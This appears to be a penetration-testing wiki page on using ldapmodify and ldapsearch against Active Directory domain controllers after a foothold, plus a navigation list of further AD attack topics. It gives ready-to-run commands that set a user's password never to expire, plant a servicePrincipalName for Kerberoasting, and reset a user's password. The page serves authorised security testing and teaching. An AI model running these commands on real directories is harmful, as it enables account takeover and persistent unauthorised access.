LdapModify

When to Use

You'll know when you've found a domain controller, because it will have several ports open that clearly distinguish it:

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Upon establishing a foothold on a domain-joined host, you could use a SOCKS proxy and proxychains or a layer 3 tunnel like ligolo-ng to do a sweep of the host's subnet in order to enumerate and extend your attack surface.

Query the Domain Owned by the Domain Controller

Very helpful in post-compromise scenario
Found likely candidate for domain controller based on port signature
- DNS
- LDAP
- Kerberos
- SMB
Will allow the operator to discover the domain owned by the domain controller

# Query the domain context
ldapsearch -x -H ldap://dc-ip-here -s base namingcontexts

# Through a proxy host
proxychains -q ldapsearch -x -H ldap://dc-ip-here -s base namingcontexts

Authentication Options

These are some common flags you'll see when authenticating with ldapmodify:

-x : simple authentication (instead of SASL)
-H : target LDAP/S server
-D : DistinguishedName (who you're authenticating as)
- Acceptable formats -- assumes the domain is contoso.org
  - DistinguishedName: CN=admin,DC=contoso,DC=org
  - UserPrincipalName: admin@contoso.org
  - sAMAccountName: contoso.org\admin
-W : prompt for password
-w : provide a password on the command line (not recommended in production environments)

Example Commands

Say you found a domain with a distinguished name of "DC=contoso,DC=org". This means this Domain Controller has a top-level domain of contoso.org. If the user email is admin@contoso.org, then the DistinguishedName is CN=admin,DC=contoso,DC=org.

Set UAC 66048 (Password Never Expires)

ldapmodify -x -H ldap://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
replace: userAccountControl
userAccountControl: 66048
EOF

Set a ServicePrincipalName (cifs/cifs)

ldapmodify -x -H ldap://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
add: servicePrincipalName
servicePrincipalName: cifs/cifs             
EOF

Change a User Password (jane.doe)

ldapmodify -x -H ldap://dc-ip-here -D 'admin@contoso.org' -W << EOF
dn: CN=jane.doe,OU=Users,DC=contoso,DC=org
changetype: modify
replace: userPassword
userPassword: P@$$word123!
EOF

More Examples

See this page for more example commands using Kerberos authentication

IPv6 DNS Spoofing

LLMNR Poisoning

Enumerating Hosts and Identifying the Domain Controllers

Passback Attacks

SMB Relay

NULL Session Enumeration

Kerberos Pre-Auth Username Enumeration

AS-REP Roasting

NTLM Credential Stuffing

PrintNightmare

Using Faketime for Ad-Hoc Kerberos Authentication

Kerberos Authentication from Kali

LdapDomainDump

Remote Bloodhound

BloodHound

LdapSearch

Dumping DNS Records with adidnsdump

Enum4Linux

NetExec

GetADUsers.py

GetUserSPNs.py

PowerShell AD Module on Any Domain Host as Any User

PowerView

Manual Enumeration

Extracting Secrets from PCAPs

Linux Remote Desktop Client

Pass the Hash

Pass the Password

Pass the Key

Pass the Certificate

Pass the Ticket

Password & Credential Brute Force

Spawn Processes as Other Users

Kerberoasting

Dumping Passwords from Windows Credential Manager

Dumping Hashes without Mimikatz

LdapModify

Mimikatz

Group Policy Preferences (GPP)

Impacket-Addcomputer

DCSync

Token Impersonation

Evil-WinRM Alternatives

PrintNightmare

ZeroLogon

LdapModify

When to Use

Query the Domain Owned by the Domain Controller

Authentication Options

Example Commands

More Examples